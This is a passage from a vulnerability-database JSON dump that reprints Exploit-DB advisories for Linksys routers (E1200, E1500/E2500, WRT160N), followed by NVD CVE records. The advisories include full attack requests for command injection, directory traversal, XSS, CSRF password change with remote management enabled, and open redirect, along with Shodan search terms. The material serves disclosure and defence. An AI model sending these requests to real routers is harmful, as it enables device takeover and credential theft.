easier:\r\n\r\n\r\nhttp://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123\"><img%20src%3d\"0\"%20onerror%3dalert(\"XSSed1\")>&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=\r\n\r\n============ Solution ============\r\n\r\nUpgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.\r\n\r\nFixed Version: Ver.4.30.16 (Build 2)\r\nAvailable since 10.01.2013\r\n\r\nDownload: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de\r\nAdvisory URL: http://www.s3cur1ty.de/m1adv2013-001\r\nTwitter: @s3cur1ty_de\r\n\r\n============ Time Line: ============\r\n\r\nSeptember 2012 - discovered vulnerability\r\n03.10.2012 - Contacted Linksys and give them detailed vulnerability details\r\n03.10.2012 - Linksys responded with a case number\r\n11.10.2012 - Status update from Linksys\r\n23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware\r\n29.10.2012 - Send the Beta Agreement back\r\n29.10.2012 - Linksys gives access to the new Beta Firmware\r\n30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed\r\n30.10.2012 - Linksys responded that there is no ETA of the new firmware\r\n17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)\r\n18.01.2013 - public release\r\n===================== Advisory end =====================", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24202/"}, {"lastseen": "2016-02-04T08:14:12", "description": "Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS. CVE-2013-2679. Remote exploit for hardware platform", "published": "2013-04-27T00:00:00", "type": "exploitdb", "title": "Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2679"], "modified": "2013-04-27T00:00:00", "id": "EDB-ID:38501", "href": "https://www.exploit-db.com/exploits/38501/", "sourceData": "source: http://www.securityfocus.com/bid/59558/info\r\n\r\nThe Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.\r\n\r\nCisco Linksys E1200 N300 running firmware 2.0.04 is vulnerable. \r\n\r\nhttp://www.example.com/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27\r\n\r\nhttp://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1 ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38501/"}, {"lastseen": "2016-02-02T23:22:59", "description": "Linksys E1500/E2500 - Multiple Vulnerabilities. CVE-2013-2678. Webapps exploit for hardware platform", "published": "2013-02-11T00:00:00", "type": "exploitdb", "title": "Linksys E1500/E2500 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678"], "modified": "2013-02-11T00:00:00", "id": "EDB-ID:24475", "href": "https://www.exploit-db.com/exploits/24475/", "sourceData": "Device Name: Linksys E1500 / E2500\r\nVendor: Linksys\r\n\r\n============ Device Description: ============\r\n\r\nThe Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files.\r\n\r\nThe installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.\r\n\r\nSource: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...\r\n\r\n============ Vulnerable Firmware Releases - e1500: ============\r\n\r\nFirmware-Version: v1.0.00 - build 9 Feb. 17, 2011\r\nFirmware-Version: v1.0.04 - build 2 M\u0102\u00a4r. 8, 2012\r\nFirmware-Version: v1.0.05 - build 1 Aug. 23, 2012\r\n\r\n============ Vulnerable Firmware Releases - e2500: ============\r\n\r\nFirmware Version: v1.0.03 (only tested for known OS command injection)\r\n\r\nOther versions may also be affected.\r\n\r\n============ Shodan Torks ============\r\n\r\nShodan Search: linksys e1500\r\nShodan Search: linksys e2500\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n * OS Command Injection / E1500 and E2500 v1.0.03 \r\n\r\n=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26\r\n\r\nThe vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.\r\nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands.\r\n\r\nExample Exploit:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Diagnostics.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 185\r\nConnection: close\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=\r\n\r\nChange the request methode from HTTP Post to HTTP GET makes the exploitation easier:\r\n\r\nhttp://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png\r\n\r\n * Directory traversal - tested on E1500: \r\n\r\n=> parameter: next_page\r\n\r\nAccess local files of the device. You need to be authenticated or you have to find other methods for accessing the device.\r\n\r\nRequest:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Wireless_Basic.asp\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 75\r\n\r\nsubmit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version\r\n\r\nResponse:\r\nHTTP/1.1 200 Ok\r\nServer: httpd\r\nDate: Thu, 01 Jan 1970 00:00:29 GMT\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\r\nContent-Type: text/html\r\nConnection: close\r\n\r\nLinux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png\r\n\r\n * For changing the current password there is no request of the current password - tested on E1500 \r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\r\n\r\nExample Request:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.1.1/Management.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 311\r\n\r\nsubmit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: \r\n\r\nhttp://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n * Reflected Cross Site Scripting - tested on E1500 \r\n\r\n=> Parameter: wait_time=3'%3balert('pwnd')//\r\n\r\nInjecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.\r\n\r\nExample Exploit:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Wireless_Basic.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 300\r\n\r\nsubmit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png\r\n\r\n * Redirection - tested on E1500 \r\n\r\n=> Paramter: submit_button=http://www.pwnd.pwnd%0a\r\n\r\nInjecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.\r\n\r\nExample Exploit:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.199\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.199/Wireless_Basic.asp\r\nAuthorization: Basic xxxx\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 290\r\n\r\nsubmit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de\r\nAdvisory URL: http://www.s3cur1ty.de/m1adv2013-004\r\nTwitter: @s3cur1ty_de\r\n\r\n============ Time Line: ============\r\n\r\nOctober 2012 - discovered vulnerability\r\n21.10.2012 - contacted Linksys with vulnerability details\r\n23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1\r\n27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1\r\n27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1\r\n29.10.2012 - Linksys responded with case number\r\n13.11.2012 - /me requested update of the progress\r\n15.11.2012 - Linksys sends Beta Agreement\r\n16.11.2012 - Linksys sends the Beta Firmware for testing\r\n16.11.2012 - tested Beta version\r\n18.11.2012 - informed Linksys about the results\r\n30.11.2012 - reported the same OS Command injection vulnerability in model E2500\r\n10.12.2012 - /me requested update of the progress\r\n23.12.2012 - Update to Linksys with directory traversal vulnerability\r\n09.01.2013 - Case closed\r\n05.02.2013 - public release\r\n\r\n===================== Advisory end =====================\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24475/"}, {"lastseen": "2016-02-02T23:23:24", "description": "Linksys WRT160N - Multiple Vulnerabilities. CVE-2013-2678. Webapps exploit for hardware platform", "published": "2013-02-11T00:00:00", "type": "exploitdb", "title": "Linksys WRT160N - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2678"], "modified": "2013-02-11T00:00:00", "id": "EDB-ID:24478", "href": "https://www.exploit-db.com/exploits/24478/", "sourceData": "Device Name: Linksys WRT160Nv2\r\nVendor: Linksys/Cisco\r\n\r\n============ Device Description: ============ \r\n\r\nBest For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media\r\n\r\nFeatures:\r\n * Fast Wireless-N connectivity frees you to do more around your home\r\n * Easy to set up and use, industrial-strength security protection\r\n * Great for larger homes with many users\r\n\r\nSource: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm\r\n\r\n============ Vulnerable Firmware Releases: ============ \r\n\r\nFirmware Version: v2.0.03 build 009\r\n\r\n============ Shodan Torks ============ \r\n\r\nShodan Search: WRT160Nv2\r\n\t=> 4072 results\r\n\r\n============ Vulnerability Overview: ============ \r\n\r\n* OS Command Injection\r\n\r\n\t=> parameter: ping_size\r\n\r\nThe vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.\r\nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands.\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Diagnostics.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 181\r\nConnection: close\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e101|&ping_times=5&traceroute_ip=\r\n\r\nChange the request methode from HTTP Post to HTTP GET makes the exploitation easier (CSRF):\r\n\r\nhttp://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e100|&ping_times=5&traceroute_ip=\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png\r\n\r\n* Directory traversal:\r\n\r\n\t=> parameter: next_page\r\n\t\r\nAccess local files of the device. You need to be authenticated or you have to find other methods for accessing the device.\r\n\r\nRequest:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Wireless_Basic.asp\r\nAuthorization: Basic XXXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 77\r\n\r\nsubmit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version\r\n\r\nResponse:\r\nHTTP/1.1 200 Ok\r\nServer: httpd\r\nDate: Thu, 01 Jan 1970 02:53:16 GMT\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\r\nContent-Type: text/html\r\nConnection: close\r\n\r\nLinux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png\r\n\r\n* XSS\r\n\r\nInjecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.\r\n\r\n\t=> Setup => DDNS\r\n\t=> parameter ddns_enable\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/DDNS.asp\r\nAuthorization: Basic XXXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 122\r\n\r\nsubmit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable='%3balert('pwnd')//\r\n\r\n\t=> Setup => Basic Setup\r\n\t=> parameter need_reboot\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/index.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 568\r\n\r\npptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot='%3balert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08+1+1&_daylight_time=1\r\n\r\n\t=> Administration => Diagnostics\r\n\t=> parameter ping_ip and ping_size\r\n\t\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Diagnostics.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 201\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1'><script>alert(2)</script>&ping_size=32'><script>alert(1)</script>&ping_times=5&traceroute_ip=\r\n\r\nIt is possible that there are much more XSS Vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities.\r\n\r\n* For changing the current password there is no request of the current password\r\n\r\n\t=> parameter: http_passwd and http_passwdConfirm\r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\r\n\r\nPOST /apply.cgi HTTP/1.1\r\nHost: 192.168.178.233\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nReferer: http://192.168.178.233/Management.asp\r\nAuthorization: Basic XXXX=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 250\r\n\r\nsubmit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:\r\n\r\nhttp://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de/advisories\r\nTwitter: @s3cur1ty_de\r\n\r\n============ Time Line: ============\r\n\r\nDezember 2012 - discovered vulnerability\r\n23.12.2012 - Contacted Linksys and give them detailed vulnerability details\r\n11.02.2013 - public release\r\n\r\n===================== Advisory end =====================", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24478/"}], "cve": [{"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices store passwords in cleartext allowing remote attackers to obtain sensitive information.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-05T21:15:00", "title": "CVE-2013-2680", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2680"], "modified": "2020-02-07T13:14:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2680", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:cisco:linksys_e4200_firmware:1.0.05:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-02-18T17:15:00", "title": "CVE-2013-2679", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2679"], "modified": "2020-02-27T16:58:00", "cpe": ["cpe:/o:belkin:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2679", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:belkin:linksys_e4200_firmware:1.0.05:build7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:52", "description": "Cisco Linksys E4200 1.0.05 Build 7 devices contain an Information Disclosure Vulnerability which allows remote attackers to obtain private IP addresses and other sensitive information.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-02-06T21:15:00", "title": "CVE-2013-2683", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2683"], "modified": "2020-02-07T13:58:00", "cpe": ["cpe:/o:cisco:linksys_e4200_firmware:1.0.05"], "id": "CVE-2013-2683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2683", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": 